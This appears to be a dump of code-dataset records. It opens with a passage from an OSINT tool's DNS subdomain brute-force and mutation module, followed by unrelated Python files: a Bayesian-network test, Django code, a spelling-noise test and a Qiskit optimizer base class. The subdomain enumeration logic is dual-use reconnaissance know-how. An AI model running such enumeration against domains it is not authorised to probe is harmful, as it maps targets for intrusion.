nameserver: {nameserver}\")\n valid = False\n except Exception as e:\n self.sf.debug(f\"Garbage query to nameserver {nameserver} failed successfully: {e}\")\n\n if valid:\n self.sf.debug(f\"Valid nameserver: {nameserver}\")\n with self.lock:\n self.resolvers.append(resolver)\n else:\n self.sf.debug(f\"Invalid nameserver: {nameserver}\")\n\n return valid\n\n # What events is this module interested in for input\n def 
watchedEvents(self):\n ret = [\"DOMAIN_NAME\"]\n if not self.opts[\"domainonly\"] or self.opts[\"numbermutation\"] or self.opts[\"alphamutation\"]:\n ret += [\"INTERNET_NAME\", \"INTERNET_NAME_UNRESOLVED\"]\n return ret\n\n def producedEvents(self):\n return [\"INTERNET_NAME\"]\n\n def isValidHost(self, host, ips):\n \"\"\"Verify that the record is valid, not a duplicate, and not resulting from wildcard DNS\n\n Args:\n host (str): host to validate\n ips (list): IP addresses for hostname\n\n Returns:\n boolean: whether the record is valid\n \"\"\"\n\n # if we haven't seen the host before\n if host not in self.state[\"valid_hosts\"]:\n # if it's a wildcard\n if self.isWildcard(host, ips):\n self.sf.debug(f\"Invalid host (wildcard): {host}\")\n return False\n else:\n self.sf.debug(f\"Already processed host: {host}\")\n return False\n\n # make double-sure that this host actually exists\n ips_google = self.resolve(host, nameserver=\"8.8.8.8\")[1]\n ips_cloudflare = self.resolve(host, nameserver=\"1.1.1.1\")[1]\n if not ips_google or not ips_cloudflare:\n self.sf.debug(f\"Incorrectly-reported subdomain {host} does not exist.\")\n return False\n\n return True\n\n def sendEvent(self, source, host, ips, method=None):\n if method is None:\n method = \"\"\n host = host.lower()\n # skip if we've already sent this event\n eventDataHash = self.sf.hashstring(host)\n if eventDataHash in self.state[\"sent_events\"]:\n self.sf.debug(\"Skipping already-sent event\")\n return\n elif eventDataHash in self.state[\"handled_events\"]:\n self.sf.debug(\"Not sending already-handled event\")\n return\n self.state[\"sent_events\"].append(eventDataHash)\n\n if ips and self.isValidHost(host, ips):\n self.state[\"valid_hosts\"].append(host)\n self.sf.info(f\"Found subdomain via {method}: {host}\")\n # Report the host\n e = SpiderFootEvent(\"INTERNET_NAME\", host, self.__name__, source)\n self.notifyListeners(e)\n\n def getNumberMutations(self, host, num=10):\n subdomains = set()\n host, domain = host.split(\".\", 1)\n\n # detects numbers and increments/decrements them\n # e.g. 
for \"host2-p013\", we would try:\n # - \"host0-p013\" through \"host12-p013\"\n # - \"host2-p003\" through \"host2-p023\"\n # limited to three iterations for sanity's sake\n for match in list(self.num_regex.finditer(host))[-3:]:\n span = match.span()\n before = host[:span[0]]\n after = host[span[-1]:]\n number = host[span[0]:span[-1]]\n numlen = len(number)\n maxnum = min(int(\"9\" * numlen), int(number) + num)\n minnum = max(0, int(number) - num)\n for i in range(minnum, maxnum + 1):\n subdomains.add(f\"{before}{str(i).zfill(numlen)}{after}\")\n if not number.startswith(\"0\"):\n subdomains.add(f\"{before}{i}{after}\")\n\n # appends numbers after each word\n # e.g., for \"host-www\", we would try:\n # - \"host1-www\", \"host2-www\", etc.\n # - \"host-www1\", \"host-www2\", etc.\n # limited to three iterations for sanity's sake\n suffixes = [\"\", \"0\", \"00\", \"-\", \"-0\", \"-00\"]\n for match in list(self.word_regex.finditer(host))[-3:]:\n for s in suffixes:\n for i in range(num):\n span = match.span()\n before = host[:span[-1]]\n after = host[span[-1]:]\n subdomains.add(f\"{before}{s}{i}{after}\")\n # basic case so we don't miss anything\n for s in suffixes:\n for i in range(num):\n subdomains.add(f\"{host}{s}{i}\")\n\n # ensure we aren't including the source subdomain\n try:\n subdomains.remove(host)\n except KeyError:\n pass\n\n return subdomains\n\n def getAlphaMutations(self, host):\n subdomains = set()\n host, domain = host.split(\".\", 1)\n\n # if the input is \"host01-www\", it tries \"host\" and \"www\"\n # or if the input is \"host01\", it tries \"host\"\n for m in self.word_regex.findall(host):\n if m != host:\n subdomains.add(m)\n # same thing but including numbers\n # if the input is \"host01-www\", it tries \"host01\" and \"www\"\n for m in self.word_num_regex.findall(host):\n if m != host:\n subdomains.add(m)\n\n # host-dev, www-host, etc.\n for m in self.state[\"alpha_mutation_wordlist\"]:\n subdomains.add(f\"{host}{m}\")\n subdomains.add(f\"{host}-{m}\")\n subdomains.add(f\"{m}{host}\")\n subdomains.add(f\"{m}-{host}\")\n\n # ensure we aren't including the source subdomain\n try:\n subdomains.remove(host)\n except KeyError:\n pass\n\n return subdomains\n\n def bruteSubdomains(self, host, subdomains, threads):\n self.sf.info(f\"Resolving {len(subdomains):,} subdomains with {threads:,} threads.\")\n\n with self.threadPool(threads=threads, name='sfp_dnsbrute_subdomains') as pool:\n for hostname, ips in pool.map(\n [f\"{sub}.{host}\" for sub in subdomains],\n self.resolve,\n ):\n if ips:\n yield (hostname, ips)\n\n def handleEvent(self, event):\n if not self.resolvers:\n self.sf.error(\"No valid DNS resolvers\")\n return\n\n host = str(event.data).lower()\n\n self.sf.debug(f\"Received event, {event.eventType}, from {event.module}\")\n\n # skip if we've already processed this event\n eventDataHash = self.sf.hashstring(host)\n if eventDataHash in self.state[\"handled_events\"]:\n self.sf.debug(f\"Skipping already-processed event, {event.eventType}, from {event.module}\")\n return\n self.state[\"handled_events\"].append(eventDataHash)\n\n subdomains = set()\n method = \"brute-force\"\n base = str(host)\n threads = int(self.opts[\"_maxthreads\"])\n # if this isn't the main target, we can still do mutations\n if event.eventType in [\"INTERNET_NAME\", \"INTERNET_NAME_UNRESOLVED\"] and not self.getTarget().matches(event.data, includeChildren=False):\n if self.opts[\"numbermutation\"]:\n numberMutations = self.getNumberMutations(host)\n self.sf.debug(f\"Generated 
{len(numberMutations):,} number mutations of {host}\")\n subdomains.update(numberMutations)\n if self.opts[\"alphamutation\"]:\n alphaMutations = self.getAlphaMutations(host)\n self.sf.debug(f\"Generated {len(alphaMutations):,} alpha mutations of {host}\")\n subdomains.update(alphaMutations)\n method = \"mutation\"\n base = host.split(\".\", 1)[-1]\n threads = min(int(len(subdomains) / 3) + 1, self.opts[\"_maxthreads\"])\n # if this is the main target or we're brute-forcing subdomains of subdomains\n if self.getTarget().matches(event.data, includeChildren=False) or not self.opts[\"domainonly\"]:\n subdomains.update(set(self.state[\"sub_wordlist\"]))\n threads = int(self.opts[\"_maxthreads\"])\n\n # subdomain brute force\n for hostname, ips in self.bruteSubdomains(base, subdomains, threads=threads):\n self.sendEvent(event, hostname, ips, method)\n", "repo_name": "0x4A4C/spiderfoot", "sub_path": "modules/sfp_dnsbrute.py", "file_name": "sfp_dnsbrute.py", "file_ext": "py", "file_size_in_byte": 15850, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "31", "api": [{"api_name": "spiderfoot.SpiderFootPlugin", "line_number": 10, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 36, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 50, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 56, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 57, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 58, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 77, "usage_type": "call"}, {"api_name": "dns.resolver.resolver.Resolver", "line_number": 98, "usage_type": "call"}, {"api_name": "dns.resolver.resolver", "line_number": 98, "usage_type": "attribute"}, {"api_name": "dns.resolver", "line_number": 98, "usage_type": "name"}, {"api_name": "dns.resolver.resolver", "line_number": 109, "usage_type": "attribute"}, {"api_name": "dns.resolver", "line_number": 109, "usage_type": "name"}, {"api_name": "random.SystemRandom", "line_number": 147, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 166, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 167, "usage_type": "call"}, {"api_name": "dns.resolver.resolver.Resolver", "line_number": 186, "usage_type": "call"}, {"api_name": "dns.resolver.resolver", "line_number": 186, "usage_type": "attribute"}, {"api_name": "dns.resolver", "line_number": 186, "usage_type": "name"}, {"api_name": "random.SystemRandom", "line_number": 199, "usage_type": "call"}, {"api_name": "spiderfoot.SpiderFootEvent", "line_number": 275, "usage_type": "call"}]}
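The wildcard handling in the record above reduces to resolving a random host under the domain and treating any answer as evidence of wildcard DNS; a standalone sketch of that probe, assuming dnspython >= 2.0 (where resolve() supersedes the deprecated query()):

```python
import random
import string
import dns.resolver

def probe_wildcard(domain, nameserver="8.8.8.8"):
    # a random ten-letter host should not exist; any A records returned
    # suggest the domain answers wildcard queries (same idea as getWildcardIPs)
    resolver = dns.resolver.Resolver()
    resolver.nameservers = [nameserver]
    randhost = "".join(random.choices(string.ascii_lowercase, k=10)) + "." + domain
    try:
        return [str(a) for a in resolver.resolve(randhost, "A")]
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer):
        return []  # no wildcard behaviour observed
```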
+{"seq_id": "13833285409", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ntest_pinfer\n----------------------------------\n\nTests for `pinfer` module.\n\"\"\"\n\nimport unittest\n\nimport networkx as nx\nimport numpy as np\n\n\ndef get_sprinkler():\n\n sprinkler = nx.DiGraph()\n\n sprinkler.add_node('R', prior=np.array([0.8, 0.2]))\n\n sprinkler.add_node('S', prior=np.array([0.9, 0.1]))\n\n sprinkler.add_node('W', CPT=np.zeros((2, 2)))\n sprinkler.add_edge('R', 'W')\n sprinkler.node['W']['CPT'][0, :] = np.array([0.8, 0.2])\n sprinkler.node['W']['CPT'][1, :] = np.array([0.0, 1.0])\n\n sprinkler.add_node('H', CPT=np.zeros((2, 2, 2)))\n sprinkler.add_edge('R', 'H')\n sprinkler.add_edge('S', 'H')\n sprinkler.node['H']['CPT'][0, 0, :] = np.array([1.0, 0.0])\n sprinkler.node['H']['CPT'][0, 1, :] = np.array([0.1, 0.9])\n sprinkler.node['H']['CPT'][1, 0, :] = np.array([0.0, 1.0])\n sprinkler.node['H']['CPT'][1, 1, :] = np.array([0.0, 1.0])\n\n return sprinkler\n\n\ndef sprinkler_example(analyse_function):\n\n sprinkler = get_sprinkler()\n\n analyse_function(sprinkler)\n\n assert (np.round(sprinkler.node['R']['belief'], 8) == np.array([0.8, 0.2])).all()\n assert (np.round(sprinkler.node['S']['belief'], 8) == np.array([0.9, 0.1])).all()\n assert (np.round(sprinkler.node['W']['belief'], 8) == np.array([0.64, 0.36])).all()\n assert (np.round(sprinkler.node['H']['belief'], 8) == np.array([0.728, 0.272])).all()\n\n sprinkler.node['H']['observation'] = np.array([0., 1.])\n\n analyse_function(sprinkler)\n\n assert (np.round(sprinkler.node['R']['belief'], 8) ==\n np.array([0.26470588, 0.73529412])).all()\n\n assert (np.round(sprinkler.node['S']['belief'], 8) ==\n np.array([0.66176471, 0.33823529])).all()\n\n assert (np.round(sprinkler.node['W']['belief'], 8) ==\n np.array([0.21176471, 0.78823529])).all()\n\n assert (np.round(sprinkler.node['H']['belief'], 8) ==\n np.array([0.00000000, 1.00000000])).all()\n\n sprinkler.node['W']['observation'] = np.array([0., 1.])\n\n analyse_function(sprinkler)\n\n assert (np.round(sprinkler.node['R']['belief'], 8) ==\n np.array([0.06716418, 0.93283582])).all()\n\n assert (np.round(sprinkler.node['S']['belief'], 8) ==\n np.array([0.83955224, 0.16044776])).all()\n\n assert (np.round(sprinkler.node['W']['belief'], 8) ==\n np.array([0.00000000, 1.00000000])).all()\n\n assert (np.round(sprinkler.node['H']['belief'], 8) ==\n np.array([0.00000000, 1.00000000])).all()\n\n\ndef get_cancer():\n\n #\n # Twardy, C., Nicholson, a, Korb, K., & McNeil, J. 
(2004).\n # Data mining cardiovascular bayesian networks\n #\n\n cancer = nx.DiGraph()\n\n cancer.add_node('M', prior=np.array([0.1, 0.9]))\n\n cancer.add_node('S', CPT=np.zeros((2, 2)))\n cancer.add_edge('M', 'S')\n cancer.node['S']['CPT'][0, :] = np.array([0.8, 0.2])\n cancer.node['S']['CPT'][1, :] = np.array([0.2, 0.8])\n\n cancer.add_node('B', CPT=np.zeros((2, 2)))\n cancer.add_edge('M', 'B')\n cancer.node['B']['CPT'][0, :] = np.array([0.95, 0.05])\n cancer.node['B']['CPT'][1, :] = np.array([0.80, 0.20])\n\n cancer.add_node('C', CPT=np.zeros((2, 2, 2)))\n cancer.add_edge('B', 'C')\n cancer.add_edge('S', 'C')\n cancer.node['C']['CPT'][0, 0, :] = np.array([0.95, 0.05])\n cancer.node['C']['CPT'][0, 1, :] = np.array([0.20, 0.80])\n cancer.node['C']['CPT'][1, 0, :] = np.array([0.20, 0.80])\n cancer.node['C']['CPT'][1, 1, :] = np.array([0.20, 0.80])\n\n cancer.add_node('H', CPT=np.zeros((2, 2)))\n cancer.add_edge('B', 'H')\n cancer.node['H']['CPT'][0, :] = np.array([0.4, 0.6])\n cancer.node['H']['CPT'][1, :] = np.array([0.2, 0.8])\n\n cancer.node['C']['observation'] = np.array([0., 1.])\n\n return cancer\n\n\ndef cancer_example(analyse_function):\n\n cancer = get_cancer()\n\n analyse_function(cancer)\n\n assert (np.round(cancer.node['M']['belief'], 3) == np.array([0.036, 0.964])).all()\n assert (np.round(cancer.node['S']['belief'], 3) == np.array([0.068, 0.932])).all()\n assert (np.round(cancer.node['B']['belief'], 3) == np.array([0.767, 0.233])).all()\n assert (np.round(cancer.node['C']['belief'], 3) == np.array([0.000, 1.000])).all()\n assert (np.round(cancer.node['H']['belief'], 3) == np.array([0.353, 0.647])).all()\n\n\nfrom pinfer.infer import analyse_polytree\n\n\nclass TestPolytree(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def test_sprinkler(self):\n sprinkler_example(analyse_polytree)\n\n def tearDown(self):\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n", "repo_name": "nickfyson/pinfer", "sub_path": "tests/test_pinfer.py", "file_name": "test_pinfer.py", "file_ext": "py", "file_size_in_byte": 4565, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "networkx.DiGraph", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array", 
"line_number": 52, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 82, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 134, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 140, "usage_type": "attribute"}, {"api_name": "pinfer.infer.analyse_polytree", "line_number": 146, "usage_type": "argument"}, {"api_name": "unittest.main", "line_number": 153, "usage_type": "call"}]}
+{"seq_id": "34490050869", "text": "from django.shortcuts import render\nfrom django.core.paginator import Paginator\n\nfrom ..objects.menuitem import MenuItem\nfrom ..models import News\n\n\ndef index(request):\n news_list = News.objects.filter(hidden=False).order_by(\"-created_at\")\n paginator = Paginator(news_list, 5)\n page = request.GET.get(\"page\") if \"page\" in request.GET else 1\n\n menu_items = []\n if request.user.is_authenticated:\n if request.user.profile.roles.filter(name=\"writer\").exists():\n menu_items.append(MenuItem(\n \"/news/my\",\n \"My news\"\n ))\n\n if request.user.is_superuser:\n menu_items.append(MenuItem(\n \"/admin\",\n \"Admin\"\n ))\n\n menu_items.append(MenuItem(\n \"/accounts/logout\",\n \"Log out\"\n ))\n else:\n menu_items.extend((\n MenuItem(\n \"/accounts/login\",\n \"Log in\"\n ),\n MenuItem(\n \"/register\",\n \"Register\"\n )\n ))\n\n context = {\n \"title\": \"Latest news\",\n \"news_list\": paginator.get_page(page),\n \"menu_items\": menu_items,\n }\n\n return render(request, \"index.html\", context)\n", "repo_name": "hts1238/Django-Example", "sub_path": "DjangoExample/DjangoExampleApp/views/index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 1259, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "models.News.objects.filter", "line_number": 9, "usage_type": "call"}, {"api_name": "models.News.objects", "line_number": 9, "usage_type": "attribute"}, {"api_name": "models.News", "line_number": 9, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 10, "usage_type": "call"}, {"api_name": "objects.menuitem.MenuItem", "line_number": 16, "usage_type": "call"}, {"api_name": "objects.menuitem.MenuItem", "line_number": 22, "usage_type": "call"}, {"api_name": "objects.menuitem.MenuItem", "line_number": 27, "usage_type": "call"}, {"api_name": "objects.menuitem.MenuItem", "line_number": 33, "usage_type": "call"}, {"api_name": "objects.menuitem.MenuItem", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 49, "usage_type": "call"}]}
+{"seq_id": "1240001821", "text": "from neuspell.noising import CharacterReplacementNoiser\nfrom neuspell.noising import ProbabilisticCharacterReplacementNoiser\nfrom neuspell.noising import WordReplacementNoiser\n\nexample_texts = [\n \"This is an example sentence to demonstrate noising in the neuspell repository.\",\n \"Here is another such amazing example!!\"\n]\n\nnoisers = [\n CharacterReplacementNoiser,\n ProbabilisticCharacterReplacementNoiser,\n WordReplacementNoiser,\n]\n\nprint(\"\\n\\n---------------------------------------\\n---------------------------------------\\n\\n\")\n\nfor noiser in noisers:\n print(f\"testing {noiser.__name__}\")\n\n my_noiser = noiser(language=\"english\")\n my_noiser.load_resources()\n noise_texts = my_noiser.noise(example_texts)\n print(noise_texts)\n\n preprocessor = noiser.create_preprocessor(lower_case=True, remove_accents=True)\n retokenizer = noiser.create_retokenizer()\n noise_texts = my_noiser.noise(example_texts, preprocessor=preprocessor, retokenizer=retokenizer)\n print(noise_texts)\n\n preprocessor = noiser.create_preprocessor(lower_case=True, remove_accents=True)\n retokenizer = noiser.create_retokenizer(use_spacy_retokenization=True)\n noise_texts = my_noiser.noise(example_texts, preprocessor=preprocessor, retokenizer=retokenizer)\n print(noise_texts)\n\n print(\"\\n\\n---------------------------------------\\n---------------------------------------\\n\\n\")\n", "repo_name": "neuspell/neuspell", "sub_path": "tests/test_noisers.py", "file_name": "test_noisers.py", "file_ext": "py", "file_size_in_byte": 1399, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 611, "dataset": "github-code", "pt": "31", "api": [{"api_name": "neuspell.noising.CharacterReplacementNoiser", "line_number": 11, "usage_type": "name"}, {"api_name": "neuspell.noising.ProbabilisticCharacterReplacementNoiser", "line_number": 12, "usage_type": "name"}, {"api_name": "neuspell.noising.WordReplacementNoiser", "line_number": 13, "usage_type": "name"}]}
+{"seq_id": "15158252807", "text": "from django.db import models\n\nfrom ._base import BaseModel, include_schema\n\n\nclass Source(BaseModel):\n class Meta:\n db_table = 'music\".\"sources'\n managed = False\n\n markets = models.ManyToManyField(\n \"Country\",\n name=\"markets\",\n db_table=include_schema(\"source_markets\"),\n related_name=\"sources\",\n )\n\n genres = models.ManyToManyField(\n \"Genre\",\n name=\"genres\",\n db_table=include_schema(\"source_genres\"),\n related_name=\"sources\",\n )\n", "repo_name": "phucnt1992/PersonaCode", "sub_path": "services/django/music/models/source.py", "file_name": "source.py", "file_ext": "py", "file_size_in_byte": 516, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "_base.BaseModel", "line_number": 6, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 11, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 11, "usage_type": "name"}, {"api_name": "_base.include_schema", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "_base.include_schema", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "32863007065", "text": "from qiskit.aqua import Pluggable\nfrom abc import abstractmethod\nfrom enum import IntEnum\nimport logging\nimport numpy as np\n\nlogger = logging.getLogger(__name__)\n\n\nclass Optimizer(Pluggable):\n \"\"\"Base class for optimization algorithm.\"\"\"\n\n class SupportLevel(IntEnum):\n not_supported = 0 # Does not support the corresponding parameter in optimize()\n ignored = 1 # Feature can be passed as non None but will be ignored\n supported = 2 # Feature is supported\n required = 3 # Feature is required and must be given, None is invalid\n\n \"\"\"\n Base class for Optimizers.\n\n This method should initialize the module and its configuration, and\n use an exception if a component of the module is\n available.\n\n Args:\n configuration (dict): configuration dictionary\n \"\"\"\n DEFAULT_CONFIGURATION = {\n 'support_level': {\n 'gradient': SupportLevel.not_supported,\n 'bounds': SupportLevel.not_supported,\n 'initial_point': SupportLevel.not_supported\n },\n 'options': []\n }\n\n @abstractmethod\n def __init__(self):\n \"\"\"Constructor.\n\n Initialize the optimization algorithm, setting the support\n level for _gradient_support_level, _bound_support_level,\n _initial_point_support_level, and empty options.\n\n \"\"\"\n super().__init__()\n if 'support_level' not in self._configuration:\n self._configuration['support_level'] = self.DEFAULT_CONFIGURATION['support_level']\n if 'options' not in self._configuration:\n self._configuration['options'] = self.DEFAULT_CONFIGURATION['options']\n self._gradient_support_level = self._configuration['support_level']['gradient']\n self._bounds_support_level = self._configuration['support_level']['bounds']\n self._initial_point_support_level = self._configuration['support_level']['initial_point']\n self._options = {}\n self._batch_mode = False\n\n @classmethod\n def init_params(cls, params):\n \"\"\"Initialize with a params dictionary.\n\n A dictionary of config params as per the configuration object. Some of these params get\n passed to scipy optimizers in an options dictionary. We can specify an options array of\n names in config dictionary to have the options dictionary automatically populated. All\n other config items, excluding name, will be passed to init_args\n\n Args:\n params (dict): configuration dict\n \"\"\"\n logger.debug('init_params: {}'.format(params))\n args = {k: v for k, v in params.items() if k != 'name'}\n optimizer = cls(**args)\n return optimizer\n\n def set_options(self, **kwargs):\n \"\"\"\n Sets or updates values in the options dictionary.\n\n The options dictionary may be used internally by a given optimizer to\n pass additional optional values for the underlying optimizer/optimization\n function used. 
The options dictionary may be initially populated with\n a set of key/values when the given optimizer is constructed.\n\n Args:\n kwargs (dict): options, given as name=value.\n \"\"\"\n for name, value in kwargs.items():\n self._options[name] = value\n logger.debug('options: {}'.format(self._options))\n\n @staticmethod\n def gradient_num_diff(x_center, f, epsilon):\n \"\"\"\n We compute the gradient with the numeric differentiation in the parallel way, around the point x_center.\n Args:\n x_center (ndarray): point around which we compute the gradient\n f (func): the function of which the gradient is to be computed.\n epsilon (float): the epsilon used in the numeric differentiation.\n Returns:\n grad: the gradient computed\n\n \"\"\"\n forig = f(*((x_center,)))\n grad = np.zeros((len(x_center),), float)\n ei = np.zeros((len(x_center),), float)\n todos = []\n for k in range(len(x_center)):\n ei[k] = 1.0\n d = epsilon * ei\n todos.append(x_center + d)\n ei[k] = 0.0\n parallel_parameters = np.concatenate(todos)\n todos_results = f(parallel_parameters)\n for k in range(len(x_center)):\n grad[k] = (todos_results[k] - forig) / epsilon\n return grad\n\n @staticmethod\n def wrap_function(function, args):\n \"\"\"\n Wrap the function to implicitly inject the args at the call of the function.\n Args:\n function (func): the target function\n args (tuple): the args to be injected\n\n \"\"\"\n def function_wrapper(*wrapper_args):\n return function(*(wrapper_args + args))\n return function_wrapper\n\n @property\n def setting(self):\n ret = \"Optimizer: {}\\n\".format(self._configuration['name'])\n params = \"\"\n for key, value in self.__dict__.items():\n if key != \"_configuration\" and key[0] == \"_\":\n params += \"-- {}: {}\\n\".format(key[1:], value)\n ret += \"{}\".format(params)\n return ret\n\n @abstractmethod\n def optimize(self, num_vars, objective_function, gradient_function=None, variable_bounds=None, initial_point=None):\n \"\"\"Perform optimization.\n\n Args:\n num_vars (int) : number of parameters to be optimized.\n objective_function (callable) : handle to a function that\n computes the objective function.\n gradient_function (callable) : handle to a function that\n computes the gradient of the objective function, or\n None if not available.\n variable_bounds (list[(float, float)]) : list of variable\n bounds, given as pairs (lower, upper). 
None means\n unbounded.\n initial_point (numpy.ndarray[float]) : initial point.\n\n Returns:\n point, value, nfev\n point: is a 1D numpy.ndarray[float] containing the solution\n value: is a float with the objective function value\n nfev: number of objective function calls made if available or None\n \"\"\"\n\n if initial_point is not None and len(initial_point) != num_vars:\n raise ValueError('Initial point does not match dimension')\n if variable_bounds is not None and len(variable_bounds) != num_vars:\n raise ValueError('Variable bounds do not match dimension')\n\n has_bounds = False\n if variable_bounds is not None:\n # If *any* value in the bounds array is equal to None then the problem does *not* have bounds\n has_bounds = not np.any(np.equal(variable_bounds, None))\n\n if gradient_function is None and self.is_gradient_required:\n raise ValueError('Gradient is required but None given')\n if not has_bounds and self.is_bounds_required:\n raise ValueError('Variable bounds are required but None given')\n if initial_point is None and self.is_initial_point_required:\n raise ValueError('Initial point is required but None given')\n\n if gradient_function is not None and self.is_gradient_ignored:\n logger.debug('WARNING: {} does not support gradient function. It will be ignored.'.format(self.configuration['name']))\n if has_bounds and self.is_bounds_ignored:\n logger.debug('WARNING: {} does not support bounds. It will be ignored.'.format(self.configuration['name']))\n if initial_point is not None and self.is_initial_point_ignored:\n logger.debug('WARNING: {} does not support initial point. It will be ignored.'.format(self.configuration['name']))\n\n @property\n def gradient_support_level(self):\n return self._gradient_support_level\n\n @property\n def is_gradient_ignored(self):\n return self._gradient_support_level == self.SupportLevel.ignored\n\n @property\n def is_gradient_supported(self):\n return self._gradient_support_level != self.SupportLevel.not_supported\n\n @property\n def is_gradient_required(self):\n return self._gradient_support_level == self.SupportLevel.required\n\n @property\n def bounds_support_level(self):\n return self._bounds_support_level\n\n @property\n def is_bounds_ignored(self):\n return self._bounds_support_level == self.SupportLevel.ignored\n\n @property\n def is_bounds_supported(self):\n return self._bounds_support_level != self.SupportLevel.not_supported\n\n @property\n def is_bounds_required(self):\n return self._bounds_support_level == self.SupportLevel.required\n\n @property\n def initial_point_support_level(self):\n return self._initial_point_support_level\n\n @property\n def is_initial_point_ignored(self):\n return self._initial_point_support_level == self.SupportLevel.ignored\n\n @property\n def is_initial_point_supported(self):\n return self._initial_point_support_level != self.SupportLevel.not_supported\n\n @property\n def is_initial_point_required(self):\n return self._initial_point_support_level == self.SupportLevel.required\n\n def print_options(self):\n \"\"\"Print algorithm-specific options.\"\"\"\n for name in sorted(self._options):\n logger.debug('{:s} = {:s}'.format(name, str(self._options[name])))\n\n def set_batch_mode(self, mode):\n self._batch_mode = mode\n", "repo_name": 